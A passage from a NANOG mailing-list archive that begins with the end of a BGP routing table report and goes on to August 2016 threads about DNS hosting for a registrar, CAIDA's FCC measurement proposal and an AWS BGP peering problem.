Average LACNIC Region AS path length visible: 4.8
Max LACNIC Region AS path length visible: 24
Number of LACNIC region 32-bit ASNs visible in the Routing Table: 2706
Number of LACNIC addresses announced to Internet: 170203968
Equivalent to 10 /8s, 37 /16s and 27 /24s
LACNIC AS Blocks       26592-26623, 27648-28671, 52224-53247,
                       61440-61951, 64099-64197, 262144-265628 + ERX transfers
LACNIC Address Blocks  177/8, 179/8, 181/8, 186/8, 187/8, 189/8, 190/8,
                       191/8, 200/8, 201/8,

AfriNIC Region Analysis Summary
-------------------------------

Prefixes being announced by AfriNIC Region ASes: 14402
Total AfriNIC prefixes after maximum aggregation: 3245
AfriNIC Deaggregation factor: 4.44
Prefixes being announced from the AfriNIC address blocks: 16388
Unique aggregates announced from the AfriNIC address blocks: 6087
AfriNIC Region origin ASes present in the Internet Routing Table: 738
AfriNIC Prefixes per ASN: 22.21
AfriNIC Region origin ASes announcing only one prefix: 174
AfriNIC Region transit ASes present in the Internet Routing Table: 177
Average AfriNIC Region AS path length visible: 4.5
Max AfriNIC Region AS path length visible: 20
Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 244
Number of AfriNIC addresses announced to Internet: 81167616
Equivalent to 4 /8s, 214 /16s and 133 /24s
AfriNIC AS Blocks       36864-37887, 327680-328703 & ERX transfers
AfriNIC Address Blocks  41/8, 102/8, 105/8, 154/8, 196/8, 197/8,

APNIC Region per AS prefix count summary
----------------------------------------

   ASN  No of nets  /20 equiv  MaxAgg  Description
  4538        5544       4190      74  ERX-CERNET-BKB China Education and Rese
  7545        3483        385     256  TPG-INTERNET-AP TPG Telecom Limited, AU
  4766        3192      11145    1127  KIXS-AS-KR Korea Telecom, KR
 17974        2939        904      78  TELKOMNET-AS2-AP PT Telekomunikasi Indo
  9829        2633       1491     518  BSNL-NIB National Internet Backbone, IN
  9808        2143       8781      42  CMNET-GD Guangdong Mobile Communication
  4755        2056        429     225  TATACOMM-AS TATA Communications formerl
  4808        1797       2300     543  CHINA169-BJ China Unicom Beijing Provin
 24560        1532        505     217  AIRTELBROADBAND-AS-AP Bharti Airtel Ltd
 38197        1505         93     289  SUNHK-DATA-AS-AP Sun Network (Hong Kong

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC

ARIN Region per AS prefix count summary
---------------------------------------

   ASN  No of nets  /20 equiv  MaxAgg  Description
 22773        3498       2964     144  ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
  6389        2227       3671      41  BELLSOUTH-NET-BLK - BellSouth.net Inc.,
 18566        2195        405     110  MEGAPATH5-US - MegaPath Corporation, US
 20115        1937       1965     403  CHARTER-NET-HKY-NC - Charter Communicat
 30036        1757        345     267  MEDIACOM-ENTERPRISE-BUSINESS - Mediacom
   209        1717       5083     658  CENTURYLINK-US-LEGACY-QWEST - Qwest Com
  6983        1687        849     228  ITCDELTA - Earthlink, Inc., US
 16509        1376       2482     449  AMAZON-02 - Amazon.com, Inc., US
  7018        1344      20054     998  ATT-INTERNET4 - AT&T Services, Inc., US
   701        1290      10719     696  UUNET - MCI Communications Services, In

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN

RIPE Region per AS prefix count summary
---------------------------------------

   ASN  No of nets  /20 equiv  MaxAgg  Description
 39891        3329        169      15  ALJAWWALSTC-AS , SA
 20940        2740       1052    1947  AKAMAI-ASN1 , US
 34984        1976        327     357  TELLCOM-AS , TR
 12479        1313       1018      45  UNI2-AS , ES
  8551        1213        377      46  BEZEQ-INTERNATIONAL-AS Bezeqint Interne
  6849        1148        355      21  UKRTELNET , UA
 13188        1095         98      63  BANKINFORM-AS , UA
  8402        1010        544      15  CORBINA-AS Russia, RU
  9198         971        352      25  KAZTELECOM-AS , KZ
  6830         884       2752     463  LGI-UPC formerly known as UPC Broadband

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE

LACNIC Region per AS prefix count summary
-----------------------------------------

   ASN  No of nets  /20 equiv  MaxAgg  Description
 10620        3460        540     170  Telmex Colombia S.A., CO
  8151        2265       3361     544  Uninet S.A. de C.V., MX
  7303        1531        949     243  Telecom Argentina S.A., AR
  6503        1415        437      54  Axtel, S.A.B. de C.V., MX
 11830        1342        368      64  Instituto Costarricense de Electricidad
  6147        1093        377      27  Telefonica del Peru S.A.A., PE
  3816        1003        480     178  COLOMBIA TELECOMUNICACIONES S.A. ESP, C
  7738         994       1882      40  Telemar Norte Leste S.A., BR
 11172         906        125      76  Alestra, S. de R.L. de C.V., MX
 28573         895       2179     162  CLARO S.A., BR

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC

AfriNIC Region per AS prefix count summary
------------------------------------------

   ASN  No of nets  /20 equiv  MaxAgg  Description
 24863        1184        402      48  LINKdotNET-AS, EG
 36903         656        330     109  MT-MPLS, MA
 37611         652         48       2  Afrihost, ZA
 36992         539       1357      26  ETISALAT-MISR, EG
  8452         513       1472      15  TE-AS TE-AS, EG
 37492         392        246      69  ORANGE-TN, TN
 24835         346        610      16  RAYA-AS, EG
 29571         300         37      12  CITelecom-AS, CI
 15399         293         35       6  WANANCHI-KE, KE
  2018         265        327      74  TENET-1, ZA

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC

Global Per AS prefix count summary
----------------------------------

   ASN  No of nets  /20 equiv  MaxAgg  Description
  4538        5544       4190      74  ERX-CERNET-BKB China Education and Rese
 22773        3498       2964     144  ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
  7545        3483        385     256  TPG-INTERNET-AP TPG Telecom Limited, AU
 10620        3460        540     170  Telmex Colombia S.A., CO
 39891        3329        169      15  ALJAWWALSTC-AS , SA
  4766        3192      11145    1127  KIXS-AS-KR Korea Telecom, KR
 17974        2939        904      78  TELKOMNET-AS2-AP PT Telekomunikasi Indo
 20940        2740       1052    1947  AKAMAI-ASN1 , US
  9829        2633       1491     518  BSNL-NIB National Internet Backbone, IN
  8151        2265       3361     544  Uninet S.A. de C.V., MX

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet

Global Per AS Maximum Aggr summary
----------------------------------

   ASN  No of nets  Net Savings  Description
 22773        3498         3354  ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
 39891        3329         3314  ALJAWWALSTC-AS , SA
 10620        3460         3290  Telmex Colombia S.A., CO
  7545        3483         3227  TPG-INTERNET-AP TPG Telecom Limited, AU
 17974        2939         2861  TELKOMNET-AS2-AP PT Telekomunikasi Indo
  6389        2227         2186  BELLSOUTH-NET-BLK - BellSouth.net Inc.,
  9829        2633         2115  BSNL-NIB National Internet Backbone, IN
  9808        2143         2101  CMNET-GD Guangdong Mobile Communication
 18566        2195         2085  MEGAPATH5-US - MegaPath Corporation, US
  4766        3192         2065  KIXS-AS-KR Korea Telecom, KR

Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet

List of Unregistered Origin ASNs (Global)
-----------------------------------------

Bad AS  Designation  Network             Transit AS  Description
 65001  PRIVATE      5.143.176.0/20           15468  KLGELECS-AS 38, Teatralnaya st
 65001  PRIVATE      31.172.192.0/20          15468  KLGELECS-AS 38, Teatralnaya st
 65001  PRIVATE      31.172.192.0/21          15468  KLGELECS-AS 38, Teatralnaya st
 65001  PRIVATE      31.172.200.0/21          15468  KLGELECS-AS 38, Teatralnaya st
 65001  PRIVATE      31.172.208.0/21          15468  KLGELECS-AS 38, Teatralnaya st
 65001  PRIVATE      31.172.216.0/21          15468  KLGELECS-AS 38, Teatralnaya st
 65000  PRIVATE      31.219.177.0/25           8966  ETISALAT-AS P.O. Box 1150, Dub
 65000  PRIVATE      31.219.177.128/25         8966  ETISALAT-AS P.O. Box 1150, Dub
 65412  PRIVATE      41.89.7.0/24             36866  JTL, KE
 65512  PRIVATE      45.252.244.0/24          45899  VNPT-AS-VN VNPT Corp, VN

Complete listing at http://thyme.rand.apnic.net/current/data-badAS

Advertised Unallocated Addresses
--------------------------------

Network            Origin AS  Description
23.249.144.0/20        40430  COLO4JAX-AS - colo4jax, LLC, US
27.100.7.0/24          56096  UNKNOWN
41.73.1.0/24           37004  -Reserved AS-, ZZ
41.73.2.0/24           37004  -Reserved AS-, ZZ
41.73.3.0/24           37004  -Reserved AS-, ZZ
41.73.4.0/24           37004  -Reserved AS-, ZZ
41.73.5.0/24           37004  -Reserved AS-, ZZ
41.73.6.0/24           37004  -Reserved AS-, ZZ
41.73.7.0/24           37004  -Reserved AS-, ZZ
41.73.8.0/24           37004  -Reserved AS-, ZZ

Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA

Number of prefixes announced per prefix length (Global)
-------------------------------------------------------

  /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:16
  /9:13 /10:36 /11:101 /12:266 /13:518 /14:1051 /15:1771 /16:13146
  /17:7828 /18:12740 /19:25283 /20:38406 /21:40068 /22:67238 /23:59029 /24:336803
  /25:570 /26:584 /27:382 /28:54 /29:32 /30:14 /31:1 /32:33

Advertised prefixes smaller than registry allocations
-----------------------------------------------------

   ASN  No of nets  Total ann.  Description
 39891        2896        3329  ALJAWWALSTC-AS , SA
 22773        2728        3498  ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
 18566        2087        2195  MEGAPATH5-US - MegaPath Corporation, US
 30036        1570        1757  MEDIACOM-ENTERPRISE-BUSINESS - Mediacom
  6389        1438        2227  BELLSOUTH-NET-BLK - BellSouth.net Inc.,
 10620        1387        3460  Telmex Colombia S.A., CO
  6983        1338        1687  ITCDELTA - Earthlink, Inc., US
 34984        1259        1976  TELLCOM-AS , TR
 11492        1180        1278  CABLEONE - CABLE ONE, INC., US
  6849         968        1148  UKRTELNET , UA

Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos

Number of /24s announced per /8 block (Global)
----------------------------------------------

  1:1616 2:763 4:21 5:2138 6:31 8:987 12:1767
  13:43 14:1750 15:45 16:2 17:91 18:123 20:49
  22:1 23:1595 24:1799 27:2304 31:1775 32:69 33:3
  34:2 35:5 36:323 37:2307 38:1243 39:35 40:94
  41:2838 42:449 43:1859 44:43 45:2152 46:2541 47:85
  49:1189 50:901 51:12 52:544 54:345 55:7 56:7
  57:42 58:1638 59:980 60:364 61:1811 62:1504 63:1925
  64:4548 65:2177 66:4259 67:2206 68:1129 69:3261 70:1250
  71:485 72:2013 74:2546 75:347 76:393 77:1445 78:1263
  79:860 80:1274 81:1398 82:978 83:712 84:849 85:1615
  86:486 87:1096 88:543 89:2117 90:213 91:6087 92:979
  93:2369 94:2448 95:2496 96:498 97:353 98:949 99:41
  100:78 101:1085 103:11912 104:2542 105:124 106:438 107:1329
  108:647 109:2252 110:1279 111:1658 112:1041 113:1243 114:1079
  115:1667 116:1629 117:1543 118:2018 119:1585 120:926 121:1111
  122:2260 123:2005 124:1587 125:1805 128:667 129:425 130:410
  131:1353 132:628 133:172 134:471 135:141 136:384 137:394
  138:1811 139:421 140:549 141:452 142:660 143:935 144:729
  145:164 146:932 147:654 148:1391 149:538 150:645 151:872
  152:637 153:300 154:649 155:961 156:519 157:492 158:382
  159:1144 160:510 161:731 162:2375 163:559 164:903 165:1073
  166:323 167:1166 168:2020 169:664 170:1850 171:254 172:664
  173:1661 174:758 175:699 176:1726 177:4079 178:2212 179:1176
  180:2146 181:1823 182:2012 183:966 184:821 185:7139 186:3096
  187:2129 188:2171 189:1721 190:7733 191:1263 192:9007 193:5733
  194:4437 195:3848 196:1725 197:1126 198:5543 199:5741 200:7157
  201:3644 202:10133 203:9805 204:4499 205:2712 206:2974 207:3091
  208:4053 209:3877 210:3873 211:2047 212:2726 213:2366 214:866
  215:69 216:5870 217:1976 218:796 219:609 220:1638 221:868
  222:689 223:1257

End of report

From fhr at fhrnet.eu  Fri Aug 12 18:28:48 2016
From: fhr at fhrnet.eu (Filip Hruska)
Date: Fri, 12 Aug 2016 20:28:48 +0200
Subject: DNS Services for a registrar
In-Reply-To:
References:
Message-ID:

Hi,

If you are going the IaaS route, definitely check out KnotDNS project.
According to their benchmarks [1], it does much better than other DNS
servers in about every workload.

Best Regards,
Filip

[1] https://www.knot-dns.cz/benchmark/

On 12.8.2016 07:56, Ryan Finnesey wrote:
> We need to provide DNS services for domains we offer as a registrar. We were discussing internally the different options for the deployment. Does anyone see a down side to using IaaS on AWS and Azure?
>
> We were also kicking around the idea of a PaaS offering and using Azure DNS or AWS Route 53.
>
> Cheers
> Ryan
>

From beckman at angryox.com  Fri Aug 12 19:24:04 2016
From: beckman at angryox.com (Peter Beckman)
Date: Fri, 12 Aug 2016 15:24:04 -0400
Subject: DNS Services for a registrar
In-Reply-To: <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com>
References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com>
 <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com>
Message-ID:

If there are other metrics in which to measure DNS speed, availability and
redundancy, I'd love to see them. I have but my own datapoint and the
metrics from others. Tear down the testing model, but at least show a
different/better one in return.

On Fri, 12 Aug 2016, Keith Stokes wrote:

> Route53 can get expensive for lots of domains. Queries are cheap with the
> first 1M free, but if you have 1000 domains you'll pay $500/month.
>
> You can build dedicated servers in multiple AZs and data centers able to
> handle that many domains for far less.
>
> You might also consider running dedicated servers in each of AWS and
> Azure to avoid a single-provider failure.

Having worked for AWS, there is no "global" control plane that would bring
two regions down at the same time. While possible, due to say a targeted
successful attack on both regions simultaneously, highly unlikely. Control
and data plane software updates and deployments are done regionally, and
often on an Availability Zone basis where applicable, to ensure there are
no defects. Automation measures and will automatically roll back code that
breaks deployment metrics.

It's pretty sweet. Their internal tools team does amazing things with
automation.

Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10
per month per zone after that. 1000 domains would be $110 a month, not
$500. 500 million queries at $0.40 per million, another $200/month.

Who knows if you need that much, but it is pretty affordable.

Beckman
---------------------------------------------------------------------------
Peter Beckman                                                  Internet Guy
beckman at angryox.com                                 http://www.angryox.com/
---------------------------------------------------------------------------

From sean at donelan.com  Fri Aug 12 19:28:23 2016
From: sean at donelan.com (Sean Donelan)
Date: Fri, 12 Aug 2016 15:28:23 -0400 (EDT)
Subject: CAIDA selected by FCC for internet performance measurement
Message-ID:

CAIDA has submitted to the FCC its initial proposal for measuring internet
interconnection point performance metrics as part of the AT&T/DirecTV
merger conditions.

http://transition.fcc.gov/Daily_Releases/Daily_Business/2016/db0812/DA-16-909A1.pdf

From justin at cloudflare.com  Fri Aug 12 20:11:20 2016
From: justin at cloudflare.com (Justin Paine)
Date: Fri, 12 Aug 2016 13:11:20 -0700
Subject: DNS Services for a registrar
In-Reply-To:
References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com>
 <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com>
Message-ID:

I won't push further than this -- but it seems a bit silly not to
mention that CloudFlare provides free AnyCast DNS. You can elect not
to even use any of our caching if you just want to use us for DNS.

J

____________
Justin Paine
Head of Trust & Safety
CloudFlare Inc.
PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D

On Fri, Aug 12, 2016 at 12:24 PM, Peter Beckman wrote:
> If there are other metrics in which to measure DNS speed, availability and
> redundancy, I'd love to see them. I have but my own datapoint and the
> metrics from others. Tear down the testing model, but at least show a
> different/better one in return.
>
> On Fri, 12 Aug 2016, Keith Stokes wrote:
>
>> Route53 can get expensive for lots of domains. Queries are cheap with the
>> first 1M free, but if you have 1000 domains you'll pay $500/month.
>>
>> You can build dedicated servers in multiple AZs and data centers able to
>> handle that many domains for far less.
>>
>> You might also consider running dedicated servers in each of AWS and
>> Azure to avoid a single-provider failure.
>
>
> Having worked for AWS, there is no "global" control plane that would bring
> two regions down at the same time. While possible, due to say a targeted
> successful attack on both regions simultaneously, highly unlikely. Control
> and data plane software updates and deployments are done regionally, and
> often on an Availability Zone basis where applicable, to ensure there are
> no defects. Automation measures and will automatically roll back code that
> breaks deployment metrics.
>
> It's pretty sweet. Their internal tools team does amazing things with
> automation.
>
> Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10
> per month per zone after that. 1000 domains would be $110 a month, not
> $500. 500 million queries at $0.40 per million, another $200/month.
>
> Who knows if you need that much, but it is pretty affordable.
>
> Beckman
> ---------------------------------------------------------------------------
> Peter Beckman                                                  Internet Guy
> beckman at angryox.com                                 http://www.angryox.com/
> ---------------------------------------------------------------------------

From fhr at fhrnet.eu  Fri Aug 12 20:17:16 2016
From: fhr at fhrnet.eu (Filip Hruska)
Date: Fri, 12 Aug 2016 22:17:16 +0200
Subject: DNS Services for a registrar
In-Reply-To:
References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com>
 <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com>
Message-ID: <829013a4-21bc-4e61-2a3e-5c98fc423d6c@fhrnet.eu>

Even for registrars?

Because OP's question was
> We need to provide DNS services for domains we offer as a registrar.

Best Regards,
Filip

On 12.8.2016 22:11, Justin Paine via NANOG wrote:
> I won't push further than this -- but it seems a bit silly not to
> mention that CloudFlare provides free AnyCast DNS. You can elect not
> to even use any of our caching if you just want to use us for DNS.
>
> J
>
> ____________
> Justin Paine
> Head of Trust & Safety
> CloudFlare Inc.
> PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D
>
>
> On Fri, Aug 12, 2016 at 12:24 PM, Peter Beckman wrote:
>> If there are other metrics in which to measure DNS speed, availability and
>> redundancy, I'd love to see them. I have but my own datapoint and the
>> metrics from others. Tear down the testing model, but at least show a
>> different/better one in return.
>>
>> On Fri, 12 Aug 2016, Keith Stokes wrote:
>>
>>> Route53 can get expensive for lots of domains. Queries are cheap with the
>>> first 1M free, but if you have 1000 domains you'll pay $500/month.
>>>
>>> You can build dedicated servers in multiple AZs and data centers able to
>>> handle that many domains for far less.
>>>
>>> You might also consider running dedicated servers in each of AWS and
>>> Azure to avoid a single-provider failure.
>>
>>
>> Having worked for AWS, there is no "global" control plane that would bring
>> two regions down at the same time. While possible, due to say a targeted
>> successful attack on both regions simultaneously, highly unlikely. Control
>> and data plane software updates and deployments are done regionally, and
>> often on an Availability Zone basis where applicable, to ensure there are
>> no defects. Automation measures and will automatically roll back code that
>> breaks deployment metrics.
>>
>> It's pretty sweet. Their internal tools team does amazing things with
>> automation.
>>
>> Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10
>> per month per zone after that. 1000 domains would be $110 a month, not
>> $500. 500 million queries at $0.40 per million, another $200/month.
>>
>> Who knows if you need that much, but it is pretty affordable.
>>
>> Beckman
>> ---------------------------------------------------------------------------
>> Peter Beckman                                                  Internet Guy
>> beckman at angryox.com                                 http://www.angryox.com/
>> ---------------------------------------------------------------------------
>

From justin at cloudflare.com  Fri Aug 12 20:24:52 2016
From: justin at cloudflare.com (Justin Paine)
Date: Fri, 12 Aug 2016 13:24:52 -0700
Subject: DNS Services for a registrar
In-Reply-To: <829013a4-21bc-4e61-2a3e-5c98fc423d6c@fhrnet.eu>
References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com>
 <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com>
 <829013a4-21bc-4e61-2a3e-5c98fc423d6c@fhrnet.eu>
Message-ID:

Right -- we could do it, though it would be a first for us.

____________
Justin Paine
Head of Trust & Safety
CloudFlare Inc.
PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D

On Fri, Aug 12, 2016 at 1:17 PM, Filip Hruska wrote:

> Even for registrars?
>
> Because OP's question was
> > We need to provide DNS services for domains we offer as a registrar.
>
> Best Regards,
> Filip
>
>
> On 12.8.2016 22:11, Justin Paine via NANOG wrote:
>
>> I won't push further than this -- but it seems a bit silly not to
>> mention that CloudFlare provides free AnyCast DNS. You can elect not
>> to even use any of our caching if you just want to use us for DNS.
>>
>> J
>>
>> ____________
>> Justin Paine
>> Head of Trust & Safety
>> CloudFlare Inc.
>> PGP: BBAA 6BCE 3305 7FD6 6452 7115 57B6 0114 DE0B 314D
>>
>>
>> On Fri, Aug 12, 2016 at 12:24 PM, Peter Beckman
>> wrote:
>>
>>> If there are other metrics in which to measure DNS speed, availability
>>> and
>>> redundancy, I'd love to see them. I have but my own datapoint and the
>>> metrics from others. Tear down the testing model, but at least show a
>>> different/better one in return.
>>>
>>> On Fri, 12 Aug 2016, Keith Stokes wrote:
>>>
>>> Route53 can get expensive for lots of domains. Queries are cheap with the
>>>> first 1M free, but if you have 1000 domains you'll pay $500/month.
>>>>
>>>> You can build dedicated servers in multiple AZs and data centers able to
>>>> handle that many domains for far less.
>>>>
>>>> You might also consider running dedicated servers in each of AWS and
>>>> Azure to avoid a single-provider failure.
>>>>
>>>
>>>
>>> Having worked for AWS, there is no "global" control plane that would
>>> bring
>>> two regions down at the same time. While possible, due to say a targeted
>>> successful attack on both regions simultaneously, highly unlikely.
>>> Control
>>> and data plane software updates and deployments are done regionally, and
>>> often on an Availability Zone basis where applicable, to ensure there are
>>> no defects. Automation measures and will automatically roll back code
>>> that
>>> breaks deployment metrics.
>>>
>>> It's pretty sweet. Their internal tools team does amazing things with
>>> automation.
>>>
>>> Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then
>>> $0.10
>>> per month per zone after that. 1000 domains would be $110 a month, not
>>> $500. 500 million queries at $0.40 per million, another $200/month.
>>>
>>> Who knows if you need that much, but it is pretty affordable.
>>>
>>> Beckman
>>> ------------------------------------------------------------
>>> ---------------
>>> Peter Beckman Internet
>>> Guy
>>> beckman at angryox.com
>>> http://www.angryox.com/
>>> ------------------------------------------------------------
>>> ---------------
>>>
>>
>>

From surfer at mauigateway.com  Fri Aug 12 20:41:53 2016
From: surfer at mauigateway.com (Scott Weeks)
Date: Fri, 12 Aug 2016 13:41:53 -0700
Subject: CAIDA selected by FCC for internet performance measurement
Message-ID: <20160812134153.79A62684@m0087792.ppops.net>

--- sean at donelan.com wrote:
From: Sean Donelan

CAIDA has submitted to the FCC its initial proposal for
measuring internet interconnection point performance
metrics as part of the AT&T/DirecTV merger conditions.

http://transition.fcc.gov/Daily_Releases/Daily_Business/2016/db0812/DA-16-909A1.pdf
-------------------------------------------------


I don't seem to be able to get the pdf referred to in the
above link to open correctly.

https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014-90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF

Anyone else get it to open? I want to find out about
the methodology.

scott

From keiths at neilltech.com  Fri Aug 12 20:49:15 2016
From: keiths at neilltech.com (Keith Stokes)
Date: Fri, 12 Aug 2016 20:49:15 +0000
Subject: DNS Services for a registrar
In-Reply-To:
References: <0DE520AE-8CF6-4140-9DA6-4D90DF66A375@thrashyour.com>
 <2241B24E-46BF-4921-80CD-1D3F29945077@neilltech.com>
Message-ID: <9EBC4F50-4CE0-42F2-A874-6CB874D771F5@neilltech.com>

Never say "never". ;-)

Notice I did not say "you must" or "you should". It is something to
consider based on how many 9s are important to your business.

The job of many of us is to think of those things that are highly
unlikely, assign a risk and make a plan (or not) accordingly. The likely
ones are written down and "anyone" can follow them.

In this case I'd say the risk is higher that someone puts the wrong info
into a DNS change and if they are in different services and not
automatically replicated, you could be better off. Again, what are the
risks to your business?

On Aug 12, 2016, at 2:24 PM, Peter Beckman wrote:

If there are other metrics in which to measure DNS speed, availability and
redundancy, I'd love to see them. I have but my own datapoint and the
metrics from others. Tear down the testing model, but at least show a
different/better one in return.

On Fri, 12 Aug 2016, Keith Stokes wrote:

Route53 can get expensive for lots of domains. Queries are cheap with the
first 1M free, but if you have 1000 domains you'll pay $500/month.

You can build dedicated servers in multiple AZs and data centers able to
handle that many domains for far less.

You might also consider running dedicated servers in each of AWS and
Azure to avoid a single-provider failure.

Having worked for AWS, there is no "global" control plane that would bring
two regions down at the same time. While possible, due to say a targeted
successful attack on both regions simultaneously, highly unlikely. Control
and data plane software updates and deployments are done regionally, and
often on an Availability Zone basis where applicable, to ensure there are
no defects. Automation measures and will automatically roll back code that
breaks deployment metrics.

It's pretty sweet. Their internal tools team does amazing things with
automation.

Route53 is $0.50 per month per "zone" (domain) for the FIRST 25, then $0.10
per month per zone after that. 1000 domains would be $110 a month, not
$500. 500 million queries at $0.40 per million, another $200/month.

Who knows if you need that much, but it is pretty affordable.

Beckman
---------------------------------------------------------------------------
Peter Beckman                                                  Internet Guy
beckman at angryox.com                                 http://www.angryox.com/
---------------------------------------------------------------------------

---

Keith Stokes

From morrowc.lists at gmail.com  Fri Aug 12 20:50:00 2016
From: morrowc.lists at gmail.com (Christopher Morrow)
Date: Fri, 12 Aug 2016 16:50:00 -0400
Subject: CAIDA selected by FCC for internet performance measurement
In-Reply-To: <20160812134153.79A62684@m0087792.ppops.net>
References: <20160812134153.79A62684@m0087792.ppops.net>
Message-ID:

isn't this what KC presented like 3 nanogs ago?

On Fri, Aug 12, 2016 at 4:41 PM, Scott Weeks wrote:

>
>
> --- sean at donelan.com wrote:
> From: Sean Donelan
>
> CAIDA has submitted to the FCC its initial proposal for
> measuring internet interconnection point performance
> metrics as part of the AT&T/DirecTV merger conditions.
>
> http://transition.fcc.gov/Daily_Releases/Daily_Business/
> 2016/db0812/DA-16-909A1.pdf
> -------------------------------------------------
>
>
> I don't seem to be able to get the pdf referred to in the
> above link to open correctly.
>
> https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014-
> 90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF
>
> Anyone else get it to open? I want to find out about
> the methodology.
>
> scott
>
>
>

From joelja at bogus.com  Fri Aug 12 20:50:49 2016
From: joelja at bogus.com (joel jaeggli)
Date: Fri, 12 Aug 2016 13:50:49 -0700
Subject: CAIDA selected by FCC for internet performance measurement
In-Reply-To: <20160812134153.79A62684@m0087792.ppops.net>
References: <20160812134153.79A62684@m0087792.ppops.net>
Message-ID:

On 8/12/16 1:41 PM, Scott Weeks wrote:
>
> --- sean at donelan.com wrote:
> From: Sean Donelan
>
> CAIDA has submitted to the FCC its initial proposal for
> measuring internet interconnection point performance
> metrics as part of the AT&T/DirecTV merger conditions.
>
> http://transition.fcc.gov/Daily_Releases/Daily_Business/2016/db0812/DA-16-909A1.pdf
> -------------------------------------------------
>
>
> I don't seem to be able to get the pdf referred to in the
> above link to open correctly.
>
> https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014-90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF

opens fine in chrome

created by Aspose.Pdf for .NET 10.2.0

> Anyone else get it to open? I want to find out about
> the methodology.
>
> scott
>
>

From surfer at mauigateway.com  Fri Aug 12 20:59:45 2016
From: surfer at mauigateway.com (Scott Weeks)
Date: Fri, 12 Aug 2016 13:59:45 -0700
Subject: CAIDA selected by FCC for internet performance measurement
Message-ID: <20160812135945.79A62091@m0087792.ppops.net>

On Fri, Aug 12, 2016 at 4:41 PM, Scott Weeks wrote:

> --- sean at donelan.com wrote:
> From: Sean Donelan
>
> CAIDA has submitted to the FCC its initial proposal for
> measuring internet interconnection point performance
> metrics as part of the AT&T/DirecTV merger conditions.
>
> http://transition.fcc.gov/Daily_Releases/Daily_Business/
> 2016/db0812/DA-16-909A1.pdf
> -------------------------------------------------
>
>
> I don't seem to be able to get the pdf referred to in the
> above link to open correctly.
>
> https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014-
> 90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF
>
> Anyone else get it to open? I want to find out about
> the methodology.
-------------------------------------------------

On the 5th download I finally got something more than
zero bytes. Maybe they don't like Linux? >;-)

--- morrowc.lists at gmail.com wrote:
From: Christopher Morrow

isn't this what KC presented like 3 nanogs ago?
-----------------------------------------------

Thanks and I will look that up.

scott

From bob at FiberInternetCenter.com  Fri Aug 12 21:23:25 2016
From: bob at FiberInternetCenter.com (Bob Evans)
Date: Fri, 12 Aug 2016 14:23:25 -0700
Subject: Amazon BGP engineer for AWS router help.
Message-ID: <4fb1dd438f87c3260f85c7149e0ac85b.squirrel@66.201.44.180>

I have a customer working for an Amazon department/division. Amazon gave
this department an AWS connection where we have an AWS cross connect and
direct fiber path established. I have the path as well as the customer
side BGP router configured and can ping the AWS router. The Amazon
department with console access has setup issues and can not bring up BGP.
I do not see a single message sent from their AWS virtual BGP router. They
won't give me the access to the console to help fix things. They opened a
ticket last Saturday and still waiting for AWS staff help.

I want to help everyone be successful maybe they will give an Amazon
router engineer access to the console. Please contact me via email
offline.
Thank You Bob Evans CTO From surfer at mauigateway.com Fri Aug 12 21:40:11 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 12 Aug 2016 14:40:11 -0700 Subject: CAIDA selected by FCC for internet performance measurement Message-ID: <20160812144011.79A62D6F@m0087792.ppops.net> On Fri, Aug 12, 2016 at 4:41 PM, Scott Weeks wrote: > --- sean at donelan.com wrote: > From: Sean Donelan > > CAIDA has submitted to the FCC its initial proposal for > measuring internet interconnection point performance > metrics as part of the AT&T/DirecTV merger conditions. > > http://transition.fcc.gov/Daily_Releases/Daily_Business/ > 2016/db0812/DA-16-909A1.pdf > ------------------------------------------------- > > > I don't seem to be able to get the pdf referred to in the > above link to open correctly. > > https://ecfsapi.fcc.gov/file/108042516812991/MB%20Dkt%2014- > 90%20AT&T%20Inc.%20First%20Amended%20IME%20Report%20ECFS.PDF > > Anyone else get it to open? I want to find out about > the methodology. ------------------------------------------------ --- morrowc.lists at gmail.com wrote: From: Christopher Morrow isn't this what KC presented like 3 nanogs ago? ---------------------------------------------- For the archives: https://www.nanog.org/sites/default/files/caida.pdf Thanks Chris! scott From surfer at mauigateway.com Fri Aug 12 21:58:49 2016 From: surfer at mauigateway.com (Scott Weeks) Date: Fri, 12 Aug 2016 14:58:49 